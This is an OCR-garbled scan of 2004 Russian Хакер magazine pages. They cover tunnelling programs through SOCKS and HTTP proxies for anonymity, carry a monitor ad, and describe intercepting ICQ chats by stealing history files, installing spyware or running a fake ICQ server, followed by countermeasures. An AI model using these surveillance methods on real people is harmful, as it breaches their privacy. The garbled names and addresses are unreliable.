Л ПРОКСИ 118. МЕЙПЕР 

Ну вот, серфинг инета более-менее нала- 
жен. Думаешь, теперь можно успокоиться и 
вздохнуть свободно? Ага, щаз-з-з. Я бы на 
твоем месте не расслаблялся. Не стоит за- 
бывать о существовании массы прог, кото- 
рые в силу своей врожденной убогости че- 
рез прокси работать не умеют. Типичный 
пример - почтовые программы (М5 Оиііоок, 
ТИе Ваі!). Кто там кричит "веб-интерфейс - 
рулеззз"? Выйти вон и десять минут сты- 
диться! Об этом даже говорить как-то несо- 
лидно. К тому же, 
зачем отказываться 
от столь привычных 
и удобных прог- 
рамм, если и их 
можно силой заста- 
вить сохранять твое 
инкогнито. Пусть и 

ПИІЛ1 шшг; 
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Дело в том, 

что программа 
способна сама 
выбирать под- 
ходящие за- 
данным кри- 
териям серве- 
ры, исходя из 
результатов 

проверки "на вшивость". Причем, чтобы 
избежать курьезов и накладок, в настрой- 
ках А4Ргоху имеется опция, активизирую- 
щая тестирование прокси перед каждым 
его использованием. Ты можешь даже 
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Симпатичный ин- 
терфейс А4Ргоху 
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ПХТУНГ! 



П омни, что далеко не все проги подлежат соксификации. 

Зоскз умеет работать лишь с протоколами ТСР/ІР и ІЮР, в то 
время как некоторые приложения используют ІСМР. Послед- 
ние, соответственно, не поддаются и соксификации. К их числу 
можно отнести ІгасегТ, ріпд, некоторые сканеры безопасности и 
т.п. Думаю, для тебя не секрет, что имеются два РТР-протокола: 
раззіѵе РТР и асііѵе РТР. Активный РТР подразумевает два сое- 
динения: один для передачи команд, другой - для передачи 
данных. Его, к сожалению, нельзя пропустить через соке. Ду- 
маю, не нужно говорить, что из этого следует. Зато пассивный 
РТР использует лишь одно общее соединение, поэтому его лег- 
ко соксифицировать. 



они работают через прокси-сервер, но так, 
чтобы сами они об этом не подозревали. 

Одним из самых простых способов реали- 
зации этой фичи является так называемая 
ЗОСКЗ'ификация программ. Напомню, что 
именно ЗОСКЗ-прокси умеют работать с 
РОРЗ/5МТР (впрочем, и со многими други- 
ми) протоколами. 

Для того чтобы провести соксификацию, 
необходим специальный инструмент. Я уже 
давно использую прогу ЗоскзСар и очень ей 
доволен. Утилита с легкостью перехватывает 
все исходящие пакеты от клиентских прило- 
жений и перенаправляет их без изменений 
через ЗОСКЗ-сервер. Разумеется, не забы- 
вая и о передаче данных в обратную сторо- 
ну. Но не буду акцентировать внимание на 
принципе действия, перейдем ближе к делу. 

Освоение программы идет без проблем: 
все предельно прозрачно и интуитивно по- 
нятно. Советую начать с простейших настро- 
ек (РІІе -> ЗеШпдз). Там необходимо указать 
ІР-адрес ЗОСКЗ'а, его порт, версию и тип 
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л Само собой, на 
нашем компакт- 
диске ты найдешь 
весь софт, который 
был описан в этой 
статье. 




л Советы по рабо- 
те с прокси-серве- 
рами. Вся инфор- 
мация о ргоху, 
зоекз'ификации и 
рогі шаріпд’е прог- 
рамм. 

ѵлш.^геергоху.ги 
л Форум, на кото- 
ром постоянно 
публикуются спис- 
ки НТТРЗ/СОМ- 
МЕСТ, ЗОСКЗ прок- 
си-серверов, 
ѵмѵѵ.ргохузоскз.со 
т/Іогит 
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РПБОТП С ПОСРЕДНИКПМИ 




ЗоскзСар: прос- 
то и со вкусом! 



Ж •* № 



Х0КЕР/№03(БЗ)/2004 



Каждый из описанных инструментов 
идеально подходит для решения узкого 
круга задан. 
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^ѴОВапс1 1.0.3 
Размер: 486 Кб 
Ргеежаге 

ѵлш.туігееѵѵаге.па 

гоб.ги 

л Аиіогоиіе 8МТР 
1.1 

Размер: 1 1 1 Кб 
Ргееѵѵаге 

ѵмѵѵ.таззтаіі.ги/агз 
л А4Ргоху 2.52 
Размер: 1051 Кб 
ЗІіагеѵѵаге 
и/ѵѵѵѵ.іпеіргіѵасу.сот 
а ЗоскзСар 2.35 
Размер: 1014 Кб 
Ргеежаге 
ѵтѵѵ.регтео.сот 
а ЗоскзСИаіп 
Размер: 288 Кб 
ЗІіагеѵѵаге 
ѵѵѵѵѵѵ.иІазоТІ.сот/ 
зоскз 

а Зоскз2НТТР 
0.881 

Размер: 569 Кб 
Ргееѵѵаге 

ѵлш.1оіаІгс.пе1/52Іі 




идентификации. Далее следует показать хи- 
рургу пациентов, которым предстоит опера- 
ция соксификации. Для этого смело жмем 
кнопку Ыеѵѵ и выбираем нужные приложения, 
а также их рабочие каталоги. Вот, в общем- 
то, и все! Теперь, для того чтобы запустить 
программу с использованием сокса, необхо- 
димо лишь два раза кликнуть по его ярлычку 
на рабочей области ЗоскзСар а. Согласись, 
проще некуда! 

Проследить за работой программы можно 
с помощью специального окошка, где отоб- 
ражаются все активные соединения. К тому 
же прога умеет вести логи, степень детали- 
зации которых задается в настройках. Я, 
кстати, не раз к ним обращался, чтобы ра- 
зобраться с возникнувшей неполадкой. Не 
буду врать, проблемы при работе утилиты с 
ЗОСКЗ'ами отнюдь не исключены... 

Л О МОЖНО И ЧЕРЕЗ ТУННЕЛЬ... 

Еще одним важным приемом в работе с 
прокси-серверами является эмуляция (чи- 
тай замена) ЗОСКЗ'ов обычными ргоху. Сам 
посуди - возможность использования сокса 
доступна далеко не всегда, да и найти 
действующий сервер не так уж легко. К 
примеру, часто встречаются ситуации, ког- 
да компьютер подключен к инету по локаль- 



ной сети, и все его права ограничиваются 
разрешением на работу через НТТР-прокси. 
Здесь уже об анонимности речи не идет - 
почту со стороннего сервера и то забрать 
не получится. Соответственно, все твои лю- 
бые реаг-(о-реаг клиенты, тІВС и прочие 
проги, умеющие работать только через 
ЗОСКЗ, тоже останутся с носом. Админы 
зачастую обходят установку ЗОСКЗ'а сторо- 
ной, а исключений для кого-то они делать 
не любят. Им лишний геморрой и дыры в 
безопасности на фиг не нужны! По себе 
знаю ;). Создание 50СК5-НТТР туннеля в 
этом случае чуть ли не единственный спо- 
соб решения проблемы. Для реализации 
данной схемы необходимы НТТРЗ 
ргоху/ССШЕСТ ргоху (подробнее о них чи- 
тай на врезке). Софта для создания подоб- 
ного рода туннелей предостаточно. Можно 
воспользоваться программой для создания 
цепочек прокси-серверов (ЗоскзСбаіп), но я 
бы порекомендовал более простую в ис- 
пользовании утилиту 5оск$2НТТР. 

Тулза не отличается красивым внешним 
видом, но ее функциональность от этого не 
страдает. Все что от нее требуется - кон- 
вертировать ЗОСКЗ запросы в НИР анало- 
ги и туннелировать их через НТТР-прокси. 
Вся настройка сводится к указанию пара- 
метров удаленного 
прокси-сервера (ІР- 
адрес, порт и иног- 
да - имя-пароль). 

Хотя и этого можно 
не делать! 

5оск$2НТТР готова 
автоматически оп- 
ределить эти наст- 
ройки, позаимство- 
вав их у браузера. 



Если этот вариант приемлем, активизируй 
функцию Тгу Іо беіесі ргоху аиіотаіісаііу. В 
программе имеются два метода работы с 
прокси: ССШЕСТ и РОЗТ. Второй вызыва- 
ет у меня серьезные опасения, так как под- 
разумевает работу с обычным (не НТТРЗ) 
прокси. К тому же необходимо использо- 
вать специальный шлюз (стоит на сервере 
разработчиков), что также не может не 
настораживать. Поэтому настоятельно его 
не рекомендую! Впрочем, если не трогать 
соответствующие опции, прога сама выбе- 
рет то, что ей больше нравится. А метод 
СОММЕСТ, судя по комментариям авторов, 
намного предпочтительней. Ты ведь не за- 
был проверить прокси на поддержку 551? 
Помни, что 8оск52НТТР - это не волшеб- 
ная палочка, и сама весь софт на работу 
через себя не настроит. Так что не поле- 
нись зайти в настройки каждой проги и в 
качестве ЗОСКЗ-сервера указать адрес 
своей машины. 

Кстати! Если какая-нибудь программа не 
умеет работать через прокси, то следует 
сначала замутить ЗОСКЗ'ификацию (в наст- 
ройках ЗоскзСар'а опять же указываешь ад- 
рес своей машины), а потом с помощью 
5оскз2НТТР создать требуемый туннель. От- 
личная и 100% работающая комбинация... 
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Универсальная альтернатива $оск52НТГР 
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Организуем 50СК5-НТТР туннель 
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^ что юзать? 

К счастью, проблема выбора здесь не стоит. 
Каждый из описанных инструментов идеаль- 
но подходит для решения узкого круга задач. 
Нужен максимально быстрый инет - ставь 
ѴРВапсІ/ Аиіогоиіе 5МТР. Хочешь гарантиро- 
вать свою анонимность в Сети - ставь 
А4Ргоху. Желаешь отправлять неотслеживае- 
мые письма - знакомься с ЗоскзСар. Все не 
так уж и сложно. Достаточно лишь раз при- 
ложить некоторые усилия, корректно настро- 
ив выбранный софт. В дальнейшем от тебя 
требуется лишь изредка проверять работос- 
пособность используемых прокси. Но это мы 
с тобой уже проходили... ЗС 
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Вам не стоит переживать, если в ваше отсутствие ребенок захочет «поработать» на компьютере. Ведь 
монитор РИІІірз 107Т50 настолько безопасен, что имеет сертификат, разрешающий его использование в 
детских учреждениях. Кроме того, монитор 107Т50 оснащен революционной технологией Ы^ІтГРгате™ 3, 
которая оптимизирует изображение для наилучшего восприятия видео и графики, что позволит вам 
всегда выделить самое главное. 




Технические характеристики монитора РИШрз 107Т50 

Диагональ экрана: 17” 

Тип дисплея: 5М РеаІ РІаІ 

Рекомендуемое разрешение: 1024 х 768 @ 85 Гц 
Зерно: 0.25 

Особенности: Технология Ы§Гі1;Ггате™ 3 

в стандарте! 

Всегда в наличии. В течение суток — у вас на складе! 
Специальные условия для системных интеграторов! 
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тел.: (095)777-1044 
факс: (095) 958-6019 

ѵѵѵѵѵѵ.Оѵт.ги 



I Москва (095): Дестен Компьютере 785-1080 I Миган Про 900-7309 I НеоТорг 363-3825 I Онлайн Трейд 737-4748 I Остров Формоза 728-4004 I 
РестрКом 254-6422 I ТЕХНОСИЛА 777-8777 I Технофорум 506-7948 I ТНКОМП 777-0753 I Тринити Электронике 737-8046 I Формоза 135-4229 I 
Формоза Полянка 135-4229 I Эльдорадо 500-0000 I Рогсе Сотриіег 775-6655 I РОКІІМ Сотриіегз 775-7759 I Ыпк ТесЬпоІоёу 939-0076 I 
МЕІЛИ 210-4400 I Ш.ТНА Сотриіегв 729-5244. Александров (09244): Компьютер Лайн 6-5265. Благовещенск (4162): Джи-Эс-Ти-Партнер 53-9280. 
Волгоград (8442): М2 34-2101 I Южная компьютерная компания МТ 49-1920. Екатеринбург (3432): Силиконовая долина 77-7407 I Телескоп 57-2179 I 
Клосс 16-1700 I Вулкан ПК 50-0580. Иркутск (3952): Альфкомпьютерс 25-1545. Кувандык (261): Галактика 2-0506. Мурманск (8152): МайТи 56-3228. 
Ростов-на-Дону (8632): Технополис 32-3823. Набережные Челны (8552): Элекам 35-8910. Нижний Новгород (8312): Ником-Медиа 7800-60. 
Омск (3812): Ассоциация СИБИРЬ 53-1541. Оренбург (3532): Галактика 65-6037. Орск (3537): Галактика 25-0548. Пермь (3422): СЭМ 19-0545. 
Самара (8462): РАДИАНТ 34-0706. Тверь (0822): Триолит ООО 42-9152. Тольятти (8482): Кэнон-центр 48-7107. Тула (0872): Кибернетика 36-6639. 








прошлый раз я рассказал о той, как излишне любопытные граждане просматривают чужие письма. Сегодня же мы поговорим о пе- 
рехвате ісд-сообщений. 




СПОСОБЫ КОНТРОЛЯ 100-ПЕРЕПИСКИ 




З та тема у доморощенных следо- 
пытов занимает второе место 
по степени популярности. Оно и 
понятно - по аське общаться 
намного проще. Не нужно за- 
полнять поля в почтовой прог- 
рамме, часами ожидать реакции 
адресата. Соответственно, че- 
рез ІСО проходит на порядок больше полез- 
ной информации. "Ксюха, айда в лес на лы- 
жах! А потом потра..." Интересно. Теш, у 
меня мыло глючит. Вот пароль: ***. Прове- 
ришь?" Информативно. '^обп, ту ріпсосіе 
із..." Заманчиво! Наблюдатели всех стран 
расчехляют свои бинокли. Впрочем, эта 
статья не для них. Сегодня мы прощупаем 
тылы потенциального противника и попыта- 
емся найти слабые места в его инструмен- 
тарии. Ведь у любого спутника-шпиона есть 
своя "ржавая гайка". Ісд-шпионы - не иск- 
лючение. 



Л ИНТЕРЕСЫ ОБЩЕСТВЕННОСТИ 

Итак, некто очень интересуется содержани- 
ем твоих разговоров по аське. Неважно, кто 
ты и кем работаешь. Банковский служащий 
или Марта Эрастовна из отдела кадров - 
к каждому из них у взломщика может быть 
свой, сугубо личный интерес. Служащий 



распекает подчиненного за слишком прос- 
тые пароли, а Марта Эрастовна жалуется 
коллеге из Запорожья на то, что у нее ра- 
дикулит и она устает прятать ключи от 
квартиры под ковриком. Просто так попро- 
сить у пользователя хистори сообщений "на 
почитать" не получится, и тогда любопыт- 
ствующий субъект становится тем, кого в 
газетах почему-то называют хакером. Желая 
быть в курсе чужих ісч-переговоров, ново- 
явленный хакер выходит на развилку, где 
три указателя предлагают ему получить ис- 
комое путем грабежа, слежки или надува- 
тельства. 

Л ГРПБЕЖ 

Если человеку интересно, о чем ты болтаешь 
со своими коллегами по работе, он не будет 
стоять над душой и краем глаза вчитываться 
в твои сообщения. Унести с машины один 
несчастный файл намного проще, да и поль- 
зы от этого на порядок больше. йАТ-файл из 
каталога ІСО содержит все, что ему может 
понадобиться - список людей, с которыми 
ты общаешься, записи ваших разговоров, 
информацию о тебе самом и о каждом собе- 
седнике из контакт-листа. У тебя была краси- 
вая интимная тайна? Совершенно верно, еще 



вчера была. "Кто приделал кривые волосатые 
ноги моей красивой тайне?" Бедняга... 

Типичный сценарий для этого варианта 
не отличается особой изысканностью. К те- 
бе может заглянуть старый знакомый твоих 
знакомых - "помочь настроить ось". Давай, 
иди на кухню готовить чай для великого гу- 
ру, заглушай звоном тарелок тарахтение 
дисковода. Мастер уехал по своим делам, а 
вместе с ним на дискете уплыла драгоцен- 
ная информация. Впрочем, приезжать к те- 
бе домой совсем не обязательно. Тебе мо- 
гут просто прислать письмо с вложением 
наподобие СІІскМеІУоѵѵ.ехе. И ведь многие 
кликают... А программа потихоньку отправ- 
ляет нужный файл на мыло хозяину, кото- 
рый настолько обленился, что пишет трояны 
вместо того, чтобы зайти с дискетой и "по- 
мочь настроить ось". 

Что интересно, инструменты для прос- 
мотра РАТ-файлов нельзя назвать злобным 
оружием коварного хакера. Это безобидные 
утилиты, которые вполне могут пригодиться 
рядовому пользователю. Они собирают всю 
информацию из указанной базы и формиру- 
ют аккуратный документ (как правило, 
НТМБ). На мой взгляд, в таком виде базу 
читать гораздо удобнее. Ісц Нізіогу Веабег 
замечательно справляется с поставленной 









задачей. Содержимое аськиного файла лег- 
ко умещается на двух закладках. На первой 
- информация о пользователе ІСО, на вто- 
рой - список его контактов. Значение любо- 
го поля можно скопировать прямо из этого 
окна. Удобнее, чем в самой аське, все как 
на ладони. Рядом с контактами - предвари- 
тельный просмотр хистори. Кстати, отобра- 
жаются даже удаленные сообщения. Но са- 
мое главное - все это безобразие можно 
экспортировать в НТМІ.. Хочешь - вали всех 
в одну кучу. Не нравится? Закажи для каж- 
дого контакта отдельный файл. Замечатель- 
ная бесплатная утилита. 

И среди наблюдателей встречаются гур- 
маны. Тем, кого не радует НТМІ_, помогает 
АВС АтЬег ІСО СопѵеПег. Его создатели 
яростно раскручивают собственную библио- 
течку для преобразования текста во всевоз- 
можные форматы. РЭР, НТР, НТМІ_, РОС, а 
также масса их разновидностей. Этого набо- 
ра хватит на всех. При запуске считывает из 
реестра доступные номера ІСО и достает из 
базы все сообщения. Учти, что без дополни- 
тельных танцев кириллицы тебе не видать. 
Стушевался? Не переживай. Достаточно ука- 
зать в настройках подходящий шрифт, за- 
тем таблицу символов, и проблема решена. 
В меру красивая, в меру опрятная. Жаль, не 
бесплатная. Сохранил историю в отдельном 
файле и заодно разгрузил аськину базу. Ка- 
кие там хакеры, это же настоящий подарок 
для дома и любимой семьи. Такой софт 
чем-то напоминает бейсбольную биту - 
можно заняться спортом, а можно - рэке- 
том. Все от человека зависит. 



л АВС АтЬег ІСО СопѵегТег 



ЗІіагеѵѵаге, 1 1 09 Кб 

*ѵи.йеІ)еаІІе$(огеѵег.сот/ргосе$5Іехі 

л Ісд Нізіогу Веасіег ѵ 1 .8Т 

Ргееѵѵаге, 133 Кб 

Мр:Ши.хрІоіІги/ісчІіг.рІір 

а Рекламный ролик 
"Я открыл для себя ЭТО" 

В кадре - обширное волосатое пузо. 

На объектив периодически падают хлебные 
крошки. Сиплый прокуренный голос: "Развел 
одного чурку на аськин датник. Вот ведь ла- 
мо... И фигли он его РСР'шкой не отксорил? 
Докачаю кейген к линуксу и в койку". 

а Ржавые гайки 

О. АВС АтЬег ІСО СопѵеПег не позволяет выб- 
рать произвольный РАТ-файл. Отображаются 
только те пользователи, которые прописаны в 
реестре. С другой стороны, ничто не мешает 
прописать их вручную или оформить несложную 
приблуду, которая сделает это самостоятельно. 
О. Обе проги не работают с ІСО 2003. Но не 
стоит рассчитывать, что это остановит наблю- 
дателя. Хистори из последней версии аськи 
можно прочитать даже поіерасі'ом. 



А СПЕЖКО 

Ты оживленно беседуешь с голубоглазой 
нимфеткой из Финляндии, обсуждаешь с му- 
жиками результаты последнего матча и по 
мере сил помогаешь приятелю бороться с 
настройками саіс.ехе. Знаешь, что все раз- 
говоры сохраняются на диске, так как это 
встроенная функция самой аськи. Но даже 
не догадываешься о том, что где-то рядом 
над "сохранением разговоров” трудится еще 



одна программа, которую ты об этом не про- 
сил. Хреновая ситуация. Нехотя сообщил 
своему лучшему другу о том, где зарыт бес- 
ценный клад? Считай, что вышел на улицу 
и прокричал координаты в мегафон. "Това- 
рищи! Клад в лесу, лопаты в сарае, 
а я в .... но я сам виноват!" 

Сценарий для этого варианта похож на 
предыдущий. Само собой, присылать подоб- 
ную софтину письмом никто не станет, уж 
больно эти шпионские штуковины тяжелые. 
Однако СРНѴѴ пока еще никто не отменял. 
Человек приходит якобы помочь, а между 
делом ставит на машину пользователя прог- 
рамму-невидимку. В Штатах на таких прогах 
очень неплохо зарабатывают, и пользователь 
(администратор, а не жертва), как правило, 
не считается хакером. "Защити свое чадо! 
Интернет ничуть не лучше жестокой реаль- 
ности!" Родителям на полном серьезе пред- 
лагают следить за своими детьми - копаться 
в их письмах, читать личные сообщения. 

У нас на таких программах пока не зараба- 
тывают только по той причине, что у нас на 
программах не зарабатывают вообще. 

Принцип действия "одолжили" у кейлогге- 
ров. Действительно, все та же кухня - перех- 
ват сообщений, адресованных необходимой 
программе (в нашем случае - ІСО). Но если 
кейлоггер пытался по возможности правиль- 
но отформатировать список нажатых пользо- 
вателем клавиш, то софтины этого класса 
заметно поумнели. Фишка в чем: зная о том, 
что перехватываешь именно аськины сооб- 
щения, можно получить массу дополнитель- 
ной информации. К примеру, запомнить но- 
мера получателей твоего сообщения из со- 
ответствующих полей в диалоговом окне. Так 
как внешний вид диалоговых окон у разных 
программ отличается, универсальности от 
таких шпионов не дождешься. То, что будет 
работать в аське, не сработает в Осіідо, и на- 
оборот, поэтому ребята ограничиваются 
поддержкой самых распространенных пейд- 
жеров. Как правило, предлагается стандарт- 
ный набор - ІСО, АОІ-, МЗМ и Ѵаііоо. 

Сбаі ѴѴаТсТі умеет отправлять отчеты по 
мылу и копировать их на сетевой диск. Ос- 
новной упор делается на электронную почту - 
только для нее планировщик позволяет выб- 
рать день недели и время отправки письма. 



а На компакт-дис- 
ке ты найдешь весь 
софт, который был 
описан в этой 
статье. Но мы вы- 
ложили его не для 
того, чтобы ты ис- 
пытывал его на 
мирных людях. 
Просто мы счита- 
ем, что врага надо 
знать в лицо :). 




а Если хочешь 
больше узнать об 
асечке, ее багах 
и пороках, то тебе 
прямая дорога на 
ѵтѵѵ.азесііка.ги. 
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ПРОГРАММЫ ДЛЯ ПЕРЕХВАТА СООБЩЕНИЙ 



а СПаі ѴѴаІсГі 

ЗІіагеѵѵаге, 2235 Кб 

«шѵиетегіскз.сот 

а СИаТВІоскег 

ЗІіагеѵѵаге, 966 Кб 

ѵѵии.ехріогеапуѵѵбеге.сот 

а ЗруВисІсІу 

ЗІіагеѵѵаге, 1540 Кб 

ѵм.ехріогеапуйеге.сот 

а Рекламный ролик 
"Я открыл для себя ЭТО" 

В кадре - невинные синие глазки. Гордый пио- 
нерский голосок: "Наши вожатые - лучшие в 
мире. Ходят за нами с биноклем. Даже в душ 
иногда подглядывают. Вдруг мы мыло скуша- 
ем, или еще какой нежданчик приключится..." 

а Ржавые гайки 

Практически отсутствуют, поскольку софт - 
коммерческий. Когда разработчика спонсиру- 
ют, квакер вновь становится программистом. 
Как правило, подобные утилиты не поддержи- 
вают сообщения на русском языке, но шпионы 
из этого обзора великолепно справились с 
поставленной задачей. Владельцам ІСО 2003 
есть о чем задуматься - все программы тести- 
ровались на этой версии. 



роль уплыл. А вместе с ним широкими греб- 
ками уплыла история сообщений. Как же 
так? Самый свежий файрвол, антивирус еще 
пахнет компилятором, а все ЗруѴѴаге-модули 
ты по именам знаешь. Чистая машина. А ин- 
фа ушла... Не могли же в Мирабилисе поза- 
риться на твой шестизнак? Ах они сс... Нет, 
не могли. Но ведь уплыл пароль. И в люби- 
мом форуме уже кто-то нагло постит осо- 
бенно интимные отрывки их твоей хистори... 
"Алле, скорая? Вы не поверите..." 

А вот это уже интересно. Сценарий у пос- 
леднего варианта самый примитивный, а ре- 
зультат превосходит все ожидания. Смотри, 
что получается. Первым делом наблюдатель 
жалуется жертве на то, что сообщения от нее 



Интересная особенность - отчеты можно отп- 
равлять как в текстовом виде, так и в 2ІР-ар- 
хивах, причем с паролем. Знатная задумка! 
Даже если письмо с отчетом будет перехва- 
чено, толку не будет. Не зная пароля, содер- 
жимое вложенного файла не прочтешь. 

У СНаі Шсб есть коллега - СбаіВІоскег, 
который специально создан для бдительных 
родителей. Программа позволяет временно 
заблокировать указанный пейджер. Пытаешь- 
ся отправить сообщение, а он без лишних 
вопросов закрывается. Допустим, у наблюда- 
теля появился пароль к твоей аське. При по- 
мощи СбаІВІоскег он может читать твои со- 
общения. Но что если ему взбредет в голову 
поучаствовать в беседе? Легко! В заданное 
время СбаіВІоскег вырубает твою ІСО, а "ха- 
кер" заходит под твоим ником с другой ма- 
шины. И пока твои знакомые выбалтывают 
свои секреты чужаку, ты материшь "поганую 
аську с ее идиотскими глюками”... 

Так как практика показала, что на любо- 
пытных гражданах можно заработать, прог- 
раммисты решили развить идею. Зачем по- 
купать лопату и грабли, если рядом за пол- 
цены продается черенок и две насадки? Раз 
уж наш софт работает по тому же принципу, 
что и клавиатурный шпион, давайте-ка объе- 
диним эти две программы, а заодно доба- 
вим скриншоты рабочего стола, файловые 



I Пока твои знакомые выбалтывают свои 1 
секреты чужаку, ты материшь "поганую 
т аську с ее идиотскими глюками"... т 



мониторы и прочие навороты! Сказано - сде- 
лано. Нужен пример? Пожалуйста! Програм- 
ма ЗруВисІсІу одинаково эффективно читает 
чужие сообщения и буфер обмена, монито- 
рит нажатие клавиш, запущенные приложе- 
ния и распечатанные документы. Конкуренты 
отправляют отчеты по электронной почте? А 
он в довесок заливает их на РТР и контроли- 
рует посещаемые пользователем сайты. 
Очевидные преимущества примерно за ту же 
цену. Простенький интерфейс и пестрые 
скины. Восторженные родители платят день- 
ги, а кейлоггеры прогрессируют и обрастают 
новыми возможностями. К счастью, непобе- 
димые шпионы остались в фильмах про 
Джеймса Бонда. 

А НПДУВПТЕПЬСТВВ 

Представь, никто не посягнул на твой компь- 
ютер. В непроходимой чаще подкаталогов не 
появилось ни одного лишнего байта, но па- 




идут слишком долго. Затем как бы невзначай 
произносит: "Слушай, а ведь совсем недавно 
Мирабилис выложил на сайте дополнитель- 
ные адреса своих серверов. Какой-то из них 
определенно будет работать быстрее!" - и 
торжественно преподносит клиенту свой 
собственный ІР. Воистину, нет предела чело- 
веческой наивности. Пользователь с ра- 
достью меняет настройки ІСО и коннектится 
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к "самому (НЯМ!) быстрому в мире серверу 1 '. 
Ты так никогда не поступишь? Очень может 
быть. А если вспомнить первый сценарий, в 
котором наблюдатель приходит к жертве 
домой? Что помешает ему тайком изменить 
настройки ІСО? Об этом фиг догадаешься! 
Скорее будешь неделю по всему винчестеру 
мотаться, трояна искать. 

Тем временем на компьютере наблюдате- 
ля весело мигает лампами фальшивый сер- 
вер ІСО. Как только он получает от клиента 
сообщение, информация выводится на экран 
и опционально сохраняется в файл. Этот сю- 
жет вполне допускает некоторые вариации. 
Дело в том, что ІСО-клиент пользователя 
первым делом сообщает серверу ШІЧ и па- 
роль. Если наблюдателю больше ничего не 
нужно, соединение будет прервано, и он 
лишь сочувственно кивнет в ответ на фразу: 
"Миш, а эта штука вырубилась..." Вариант 
номер два - программа заступает на долж- 
ность прокси, переправляя все поступающие 
к ней данные на адрес настоящего сервера 
ІСО. При этом пользователь не замечает ни- 
чего необычного. Подумаешь, через пару 
дней новый сервер перестанет работать. 
Может, нагрузки не выдержал... Способ ин- 
тересен еще и тем, что за один раз можно 
пригласить на свой "сервер" сразу несколько 
человек. В этом случае задача немного ус- 
ложняется, т.к. "сервер” должен постоянно 
находиться в Сети, терпеливо ожидая новых 
пользователей. 

Оитріпд ІСО 2000 - проще не бывает. 
Учебное пособие для тех, кому интересно 
изучать содержимое аськиных пакетов. Для 
этого и был создан, даже иконка досталась 
по наследству от Оеірйі 3, оставили как есть. 
Его меню содержит всего два основных 
пункта - пауза и сохранение результатов в 
текстовый файл. Никаких операций с пакета- 
ми не производит. Что пришло, то и показа- 
ли. Родителям тут делать нечего, наблюда- 
тель должен самостоятельно разбирать со- 
держимое пакетов. Теоретически, после по- 
лучения пароля сервер можно выключить, но 
так как Оитріпд ІСО 2000 умеет работать в 
режиме прокси, сессию можно отследить от 
начала до конца, пользователь ничего подоз- 
рительного не заметит. ІЗруЕІ устроен анало- 
гично, но по количеству возможностей ушел 



далеко вперед. Всевоз- 
можные параметры отоб- 
ражения пакетов лучше 
опробовать самому, но о 
двух интересных возмож- 
ностях я все же упомяну. 
Первая - можно указать 
номер порта, который 
программа прослушивает 
в ожидании соединения. 
Вторая - настраиваемый 
список настоящих серве- 
ров Мирабилиса, к кото- 
рым она попытается под- 
соединиться, работая в 
режиме прокси. Занятная 
возможность. Стоит наб- 
людателям проявить сме- 
калку, и они мигом выст- 
роят цепочку серверов 
ІЗруІІ на разных маши- 
нах, после чего за твоими 
беседами будет следить 
целый коллектив :). 



ФАЛЬШИВЫЕ АСЬКИНЫ СЕРВЕРЫ 



а Оитріпд ІСО 2000 

Ргеешге, 231 Кб 

шма 2 а 1 ака.щ/$о( 1 /аЬои№тріпдісч.рІір 

а Оитріпд ІСО 2000 

исходники - Ргеешге, 8 Кб 
ш«.ге)'ейо.сот/ісч 

А ІЗруІІ 

Ргеешге (вместе с исходниками), 98 Кб 

мѵфѵідаіе.сош 

а Рекламный ролик 
"Я открыл для себя ЭТО" 

В кадре - запотевшие стекла в роговой 
оправе. За кадром слышится грустное 
монотонное бормотание: 

"Приходится постоянно висеть в онлай- 
не. Мое изможденное тельце внутривен- 
но питается при помощи самодельного 
тринитродефибриллятора. У меня появи- 
лись пролежни, а чтобы сходить в туа- 
лет..." (голос постепенно угасает) 

а Ржавые гайки 

О. Оитріпд ІСО 2000 не поддерживает 
версию 2003. Оправдание - в Сети есть 
исходники, а распухшую от комментари- 
ев спецификацию протокола найти еще 
проще. Терпение и труд всех перетрут. 
О. Под 2000/ХР ІЗруЕІ шепчет 
"ЗрооІЗегѵ: Ыпгі() іаііеб. (10048)" и рабо- 
тать отказывается. Казалось бы, картина 
маслом - несчастный следопыт, глотая 
слезы, ставит к себе на машину 98 вин- 
ду. Но см. пункт номер 1 . При наличии 
исходников желающие займутся работой 
над ошибками. 



Л ПОМОГИ СЕБЕ СОМ! 

"Информация должна быть свободной". 
Именно такая фраза содержится в манифес- 
те хакеров. Не "чужие джинсы должны на- 
лезть на мою ж..." и не "твой жена - мой же- 
на". Жаль, что наблюдатели не читают мани- 
фестов. Но есть и хорошие новости. Как 
правило, на каждую ржавую гайку найдется 
свой блестящий болт. 

О. Основная проблема коммерческого 
софта из этой статьи в том, что он рассчитан 



на работу с наиболее распространенными 
пейджерами. А пользоваться ими тебя никто 
не заставляет. Переходи на Миранду 
(Іійр://тігапбз-іт.огд/) или &РЮ 
(шшфйо.сот/Ш). Многие аськины дыры в 
этих клиентах отсутствуют, а если и появят- 
ся, то гибкая система плагинов поможет ре- 
шить любую проблему. 

в. Давно пора поставить файрвол. Боль- 
шую часть кейлоггеров легко находит 
Оиірозі (мѵи.адпіінт.сот). Программа-шпион 
внедряет свою библиотеку в родительский 
процесс аськи. Оиірозі понимает, что изме- 
нился один из ее компонентов, и сообщает 
об этом пользователю. А компонент с назва- 
нием Ітоок.сІІІ выглядит подозрительно, вер- 
но? 

Ѳ. Когда Мирабилис откроет дополни- 
тельные серверы, эта информация первым 
делом попадет на страницы их сайта. Если 
твой приятель не работает в Мирабилисе, он 
не сможет узнать об этом раньше самих раз- 
работчиков. 

O. ѴѴНОІ5 "сервер аськи"... Он находится 
в Киеве/Москве/Питере? Мы туда не пой- 
дем. Мы вообще на чужие серверы не хо- 
дим. Первым делом ищи свежие новости на 
сайте Мирабилиса. Только ради тебя дефейс 
не сделают. 

©. Пароль и хистори можно не хранить 
на диске. Не нравится? Смотри пункт 1 . Для 
той же Миранды существует плагин, автома- 
тически удаляющий пароль из базы по за- 
вершении сеанса работы. О том, сколько на- 
писали плагинов для хранения хистори в 
различных форматах, я вообще молчу. 

P. З. С приходом ІСО 2003 некоторый "бо- 
евой ІСО-софт" перестал работать. Будь уве- 
рен, это ненадолго. ЗС 

ТХР^ЙтРІСНіБ 



Хочешь увидеть свои советы в журнале? 
Присылай их на адрес ЗкІуагоѵ@геаІ.хакер.ги. 
Ведущий рубрики Тір$$Тгіск$ Иван Скляров. 



а Любишь сидеть в инете через шійліаіі службы? А 
работать с поисковиками пробовал? Нет? Ну, тогда ты 
многое потерял :). Все просто - пишешь: 

№ІІр://іти.уа.гц/уапб$еагсІі?ІехІ=ваштекст](без ско- 
бок) - это мы ищем Яндексом. 

[ іі 1 1 р : / / $ е а г с б . г а т Ы е г . г о / с д і - 
Ьіп/гатЫег_зеагсІі?ѵѵогсІ5=ваштекст] - это Рамблером. 

